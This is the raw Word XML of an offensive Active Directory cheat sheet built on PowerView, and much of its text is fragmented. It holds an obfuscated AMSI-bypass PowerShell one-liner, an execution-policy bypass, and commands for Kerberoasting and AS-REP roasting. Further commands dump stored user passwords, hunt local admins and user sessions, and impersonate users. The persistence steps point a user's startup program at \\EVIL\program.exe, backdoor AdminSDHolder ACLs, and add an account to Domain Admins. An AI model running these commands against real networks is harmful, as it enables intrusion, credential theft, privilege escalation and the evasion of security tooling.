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B5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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF82E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whoami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 To check your username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E746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hostname - To check the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95212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executionpolicy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 To check the execution policy and if it is restricted then you have to run the next command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25F82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Set-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executionpolicy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bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD332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Press “Y/y” to set as bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639124E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Always remember to bypass the Amsi to enumerate Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240BC4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To bypass active directory run this command as following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883E94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79826F3" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014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S`eT-It`em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( 'V'+'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 +  'IA' + ('blE:1'+'q2')  + ('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uZ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'+'x')  ) ( [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TYpE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](  "{1}{0}"-F'F','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  ) )  ;    (   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varI`A`BLE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  ( ('1Q'+'2U')  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zX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  ) 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VaL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  )."A`ss`Embly"."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GET`TY`Pe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"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."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g`etf`iElD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"(  ( "{0}{2}{1}" -f('a'+'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msi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'),'d',('I'+'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nitF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aile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  ),(  "{2}{4}{0}{1}{3}" -f ('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S'+'tat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'),'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',('Non'+'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Publ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'+'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'),'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c','c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,'  ))."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sE`T`VaLUE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"(  ${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n`ULl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},${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t`RuE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} )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B04E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6B3E4C6" w14:textId="77777777" w:rsidR="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375C">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E98F154" w14:textId="47E3BC19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Import-Module .\powerview.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F1FA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 For all the computers in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EE29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cn,name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,lastlogon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 For specific details of a computer in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6FA1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 for checking all the groups in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75162D2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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE623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groupname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E99E0E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0567F9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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Quick enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169DD8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564993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NetDomain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#Basic domain info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57125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#User info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67B6B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UACFilter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NOT_ACCOUNTDISABLE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description,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pwdlastset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logoncount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badpwdcount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#Basic user enabled info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9C19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LDAPFilter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'(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sidHistory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=*)' #Find users with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sidHistory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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E52E7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PreauthNotRequired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#ASREPRoastable users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33D52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-SPN #Kerberoastable users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75844DA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#Groups info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA39A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, description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72596F6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SearchBase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'CN=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AdminSDHolder,CN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=EGOTISTICAL-BANK,DC=local' | %{ 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SecurityIdentifier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} | Convert-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SidToName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AdminSDHolders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C14F4A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#Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF98F5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operatingsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52FCE82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-Unconstrained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#DCs always appear but aren't useful for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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B6206A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TrustedToAuth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#Find computers with Constrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5947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-Recurse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{$_.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MemberName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-like '*$'} #Find any machine accounts in privileged groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CD59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#Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA1B0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DomainShare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CheckShareAccess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#Search readable shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574CB9D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#Domain trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358200D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NetDomainTrust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all domain trusts (parent, children and external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765FCA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NetForestDomain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NetDomainTrust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#Enumerate all the trusts of all the domains found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99C13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#LHF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96708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#Check if any user passwords are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056826E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FormatEnumerationLimit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=-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1;Get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-DomainUser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LDAPFilter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'(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=*)' -Properties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samaccountname,memberof,userPassword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% {Add-Member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InputObject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$_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NoteProperty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'Password' "$([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System.Text.Encoding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]::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ASCII.GetString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($_.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))"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PassThru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} |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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07A8BAB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#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0EE52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LocalAdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="297AD72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#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running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NetSession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/Get-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NetLoggedon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on each host. If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Checkaccess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then it also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check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for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LocalAdmin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access in the hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BB02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UserHunter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CheckAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37C0C31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#Find interesting ACLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909592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ACLScanner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IdentityReferenceName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ObjectDN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ActiveDirectoryRights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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76ADA9B8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F54EA8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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Users, Groups and Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B74D6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E2095E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Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324592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users with several (not all) properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DD0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ExpandProperty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#List all usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2EE6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student107 #Get info about a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1501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-properties name, description #Get all descriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A7EA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-properties name,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pwdlastset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logoncount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badpwdcount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  #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Get all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pwdlastset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logoncount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and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badpwdcount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="512A005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UserField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-SearchField Description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SearchTerm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"built" #Search account with "something" in a parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C1FF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43F59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## Users Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3183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UACFilter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NOT_ACCOUNTDISABLE -properties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distinguishedname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#All enabled users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CE0A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UACFilter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ACCOUNTDISABLE #All disabled users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C39EE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UACFilter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SMARTCARD_REQUIRED #Users that require a smart card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B46A0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UACFilter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NOT_SMARTCARD_REQUIRED -Properties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#Not smart card users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74543B0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LDAPFilter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'(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sidHistory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=*)' #Find users with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sidHistory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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A378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PreauthNotRequired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#ASREPRoastable users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE09C0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-SPN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serviceprincipalname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#Kerberoastable users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF2AB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-SPN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{$_.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memberof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'Domain Admins'} #Domain admins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kerberostable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40A6645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TrustedToAuth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#Useful for Kerberos constrain delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64C18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AllowDelegation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#All privileged users that aren't marked as sensitive/not for delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166193B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 retrieve *most* users who can perform DC replication for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dev.testlab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.local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(i.e.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DCsync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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D93E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"dc=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dev,dc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testlab,dc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=local"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? {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECEC68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    ($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ObjectType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'replication-get') -or ($_.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ActiveDirectoryRights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GenericAll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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2EDD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8AAE1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9466F0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#Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1ED1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groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46308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-Domain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mydomain.local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groups of an specific domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C0278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'Domain Admins' #Get all data of a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B904E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#Search admin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grups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74FE588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myusername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 #Get groups of a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C981E5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-Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this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, the -Recurse option will print the users inside the others groups also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1F3C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-Identity "Enterprise Admins" -Domain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mydomain.local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#Remember that "Enterprise Admins" group only exists in the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rootdomain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of the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83291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NetLocalGroup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dc.mydomain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.local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ListGroups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Local groups of a machine (you need admin rights in no DC hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCFA0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NetLocalGroupMember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dcorp-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dc.dollarcorp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.moneycorp.local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users of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localgroups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in computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FC23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SearchBase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'CN=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AdminSDHolder,CN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testlab,DC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=local'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#Check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users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBA21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NetGPOGroup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restricted groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6E0F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E23B6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Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EA58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all computer objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2141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-Ping #Send a ping to check if the computers are working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F8EE6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-Unconstrained #DCs always appear but aren't useful for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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DDF970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TrustedToAuth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#Find computers with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Constrined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Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2A44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-Recurse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{$_.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MemberName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-like '*$'} #Find any machine accounts in privileged groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115496AE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52539BF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t>Logon and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025387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EF5070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NetLoggedon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&gt; #Get net logon users at the moment in a computer (need admins rights on target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B556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NetSession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&gt; #Get active sessions on the host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A95E8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LoggedOnLocal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&gt; #Get locally logon users at the moment (need remote registry (default in server OS))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BA39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LastLoggedon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&gt; #Get last user logged on (needs admin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rigths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in host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E026E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NetRDPSession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&gt; #List RDP sessions inside a host (needs admin rights in host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F408112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8A468A1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t>Shared files and folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364EC13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656C42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NetFileServer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#Search file servers. Lot of users use to be logged in this kind of servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEF07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DomainShare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CheckShareAccess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#Search readable shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BF43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InterestingDomainShareFile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#Find interesting files, can use filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E422BE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2615A12D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t>GPOs &amp; OUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5002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472E87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#GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C644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NetGPO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all policies with details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B01C9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NetGPO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displayname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the names of the policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744843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NetGPO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servername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&gt; #Get the policy applied in a computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9061B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gpresult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/V #Get current policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40022E8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Enumerate permissions for GPOs where users with RIDs of &gt; -1000 have some kind of modification/control rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFEAF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LDAPFilter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'(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objectCategory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groupPolicyContainer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)'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{ (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SecurityIdentifier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'^S-1-5-.*-[1-9]\d{3,}$') -and ($_.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ActiveDirectoryRights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WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner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')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A55A6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NetGPO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GPOName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'{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}' #Get GPO of an OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498ABB8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A48D8C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#OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1F12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NetOU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Organization Units</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C9C3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NetOU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StudentMachines |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%{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NetComputer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ADSPath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$_} #Get all computers inside an OU (StudentMachines in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780BA6C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07CAB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sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA3E0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8EA708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&lt;username&gt;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ACLs of an object (permissions of other objects over the indicated one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EAE1A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PathAcl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-Path "\\dc.mydomain.local\sysvol" #Get permissions of a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE8C0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InterestingDomainAcl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#Find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intresting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ACEs (Interesting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permisions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of "unexpected objects" (RID&gt;1000 and modify permissions) over other objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE6DF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InterestingDomainAcl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{$_.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IdentityReference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RDPUsers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"} #Check if any of the interesting permissions founds is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realated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to a username/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC6D0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GroupName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"Administrators" -Recurse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| ?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{$_.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IsGroup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-match "false"} | %{Get-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MemberName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ResolveGUIDs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} | select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ObjectDN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IdentityReference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ActiveDirectoryRights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special rights over All administrators in domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AF5B0A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20448300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t>Domain Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F624DD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51562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NetDomainTrust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all domain trusts (parent, children and external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063B5D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NetForestDomain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NetDomainTrust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#Enumerate all the trusts of all the domains found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C42F90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DomainTrustMapping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#Enumerate also all the trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405957A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E84FCD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ForestGlobalCatalog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info of current forest (no external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE45CA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ForestGlobalCatalog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-Forest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external.domain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info about the external forest (if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C46F3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SearchBase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"GC://$($ENV:USERDNSDOMAIN)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEBF31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9DA80B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NetForestTrust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Get forest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trusts (it must be between 2 roots, trust between a child and a root is just an external trust)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88DCE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38E428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DomainForeingUser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users with privileges in other domains inside the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B4E5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DomainForeignGroupMember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#Get groups with privileges in other domains inside the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819783B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4266FB7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lastRenderedPageBreak/>
        <w:t>Low-hanging fruit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519871C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050F4B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#Check if any user passwords are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCA11F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FormatEnumerationLimit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=-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1;Get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-DomainUser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LDAPFilter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'(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=*)' -Properties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samaccountname,memberof,userPassword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| % {Add-Member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InputObject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$_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NoteProperty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'Password' "$([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System.Text.Encoding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]::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ASCII.GetString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($_.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))"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PassThru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} |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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F20DF2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#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D45C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LocalAdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D0C1F52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#(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This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin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privs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are needed to do so). Useful if RCP and SMB ports are closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A4FD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.\Find-WMILocalAdminAccess.ps1 -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ComputerFile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.\computers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D76277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#Enumerate machines where a particular user/group identity has local admin rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D53F8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DomainGPOUserLocalGroupMapping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-Identity &lt;User/Group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2C71C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#Goes through the list of all computers (from DC) and executes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NetLocalGroup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to search local admins (you need root privileges on non-dc hosts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD1EF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EnumerateLocalAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6329C07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#Search unconstrained delegation computers and show users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CAAF0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DomainUserLocation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ComputerUnconstrained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ShowAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21A8EEF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#Admin users that allow delegation, logged into servers that allow unconstrained delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5452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Find-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DomainUserLocation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ComputerUnconstrained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UserAdminCount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UserAllowDelegation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E9A38C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#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running 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NetSession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/Get-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NetLoggedon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on each host. If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Checkaccess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, then it also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check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for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LocalAdmin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access in the hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D808401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UserHunter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[-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CheckAccess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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654FB2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lastRenderedPageBreak/>
        <w:t>#Search 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RDPUsers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 users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534948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UserHunter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GroupName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RDPUsers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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D332588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#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33C37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UserHunter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-Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DED677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9D68772" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375C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hi-IN"/>
        </w:rPr>
        <w:t>Deleted objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5616EFB0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8F6138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#This isn't a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powerview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command, it's a feature from the AD management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powershell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module of Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357B45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#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADBA4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ADObject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-filter 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isDeleted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eq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$true'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includeDeletedObjects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-Properties *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D025B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44858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hi-IN"/>
        </w:rPr>
        <w:t>SID to Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3328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F77705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"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-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SidToName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="741E8682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21B2A8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14375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hi-IN"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="773C50D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FF63E57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Kerberoast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[-Identity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websvc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] #Without "-Identity"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kerberoast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all possible users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C281BA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34F7622F" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375C">
      <w:pPr>
        <w:spacing w:before="28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hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use different credentials (argument)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E85F6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DE5DC8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use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an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alterate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creadential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for any function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649D65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=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ConvertTo-SecureString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BurgerBurgerBurger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!'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AsPlainText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-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFF93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$Cred = New-Object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System.Management.Automation.PSCredential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('TESTLAB\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dfm.a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', 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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9266B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Get-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-Credential $Cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743DCD8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17C1B9E" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375C">
      <w:pPr>
        <w:spacing w:before="28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hi-IN"/>
        </w:rPr>
        <w:t>Impersonate a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C4B5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124669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if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running in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sta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mode, impersonate another credential a la "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runas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/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netonly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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80519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=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ConvertTo-SecureString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'Password123!'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AsPlainText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-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8256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$Cred = New-Object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System.Management.Automation.PSCredential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('TESTLAB\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dfm.a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', $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SecPassword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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F44FF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UserImpersonation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-Credential $Cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16B20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... action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B92DCE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Invoke-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RevertToSelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="021F2190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4375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F575019" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375C">
      <w:pPr>
        <w:spacing w:before="28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4375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hi-IN"/>
        </w:rPr>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8D787" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="0014375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F613DF9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 </w:t>
      </w:r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set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the specified property for the given user identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20932A76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Set-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testuser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-Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0C2C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Set the owner of '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dfm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' in the current domain to 'harmj0y'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCA123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Set-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DomainObjectOwner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-Identity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dfm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OwnerIdentity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harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E7D94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#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ackdoor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the ACLs of all privileged accounts with the 'matt' account through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abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123463A5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Add-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DomainObjectAcl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TargetIdentity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'CN=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AdminSDHolder,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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System,DC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testlab,DC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>=local'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PrincipalIdentity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matt -Rights All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF725A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# Add user to 'Domain Admins'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32D67D" w14:textId="77777777" w:rsidR="0014375C" w:rsidRPr="0014375C" w:rsidRDefault="0014375C" w:rsidP="001437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4375C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Add-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NetGroupUser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-Username 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username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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0014375C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0014375C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Domain Admins' -Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0014375C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>my.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0014375C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6186D3DA" w14:textId="77777777" w:rsidR="00651274" w:rsidRDefault="00651274" w:rsidP="0014375C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0065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5C"/>
    <w:rsid w:val="0014375C"/>
    <w:rsid w:val="00651274"/>
    <w:rsid w:val="0073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662A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3F5F97DE-112B-4306-89E7-B3FDD6B1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43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75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4375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4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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-08T12:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-08T13:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>